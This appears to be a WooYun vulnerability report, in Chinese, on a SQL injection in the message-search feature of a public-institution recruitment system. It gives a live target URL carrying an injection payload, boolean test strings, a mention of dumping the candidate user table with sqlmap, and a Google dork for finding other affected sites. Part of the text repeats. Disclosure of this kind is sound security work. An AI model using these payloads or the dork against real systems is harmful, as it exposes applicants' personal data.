厂商:
厦门金才科技有限公司
WooYun: 某事业单位用人才系统存在任意文件下载漏洞和越权查看简历 之前有人提交过任意文件下载和越权漏洞
漏洞详情:
注入点:留言系统-->搜索处存在搜索型注入,参数Keyword
http://www.zzsyzp.com/sydwzk/refer/refer.jsp?AreaID=1&DeptType=1&PublicFlag=2&FrequentFlag=2&TypeID=0&Keyword=%25%27+and+1%3D1+and+%27%25%27%3D%27&goNo=&ShowCountNo=10&ShowCount=10&totalNO=1
Kyeword测试:
%' and 1=1 and '%'='
>%' and 1=2 and '%'='
基本确定存在注入了,sqlmap取数据看看:
看看考生用户表:
数据就不贴了,影响足够大。。
安装量及影响:
google: inurl:sydwzk/demand
影响N多事业单位
注入点:留言系统-->搜索处存在搜索型注入,参数Keyword
http://www.zzsyzp.com/sydwzk/refer/refer.jsp?AreaID=1&DeptType=1&PublicFlag=2&FrequentFlag=2&TypeID=0&Keyword=%25%27+and+1%3D1+and+%27%25%27%3D%27&goNo=&ShowCountNo=10&ShowCount=10&totalNO=1
Kyeword测试:
%' and 1=1 and '%'='
>%' and 1=2 and '%'='
基本确定存在注入了,sqlmap取数据看看:
看看考生用户表:
修复方案:
做好过滤